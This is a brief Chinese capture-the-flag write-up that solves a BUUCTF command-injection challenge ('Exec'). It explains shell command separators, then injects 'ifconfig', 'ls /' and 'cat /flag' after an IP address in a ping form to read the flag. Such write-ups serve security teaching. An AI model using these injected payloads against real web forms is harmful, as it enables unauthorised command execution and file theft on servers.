BUUCTF-Web-[ACTF2020 新生赛]Exec

    打开题目环境,如下所示

    BUUCTF-Web-[ACTF2020 新生赛]Exec - 图1

    根据题目名称Exec及该界面,猜测应该是命令注入漏洞

    输入127.0.0.1测试,输出如下:

    1. PING 127.0.0.1 (127.0.0.1): 56 data bytes

    根据命令连接符特征

    1. 命令拼接符
    2. |、||、&、&&的区别:
    3. &:无论左边是false还是true,右边都执行
    4. &&:具有短路效果,左边是false,右边不执行。
    5. |:无论左边是false还是true,右边都会执行
    6. ||:具有短路效果,左边是true,右边不执行。
    7. ;: 前后都执行,无论前面真假,同&,(linux也有)

    构造以下语句测试

    1. 127.0.0.1 | ifconfig

    发现ifconfig命令执行

    BUUCTF-Web-[ACTF2020 新生赛]Exec - 图2

    看看根目录下文件

    127.0.0.1 |ls /

    BUUCTF-Web-[ACTF2020 新生赛]Exec - 图3

    查看flag文件

    127.0.0.1 |cat /flag

    获得flag

    BUUCTF-Web-[ACTF2020 新生赛]Exec - 图4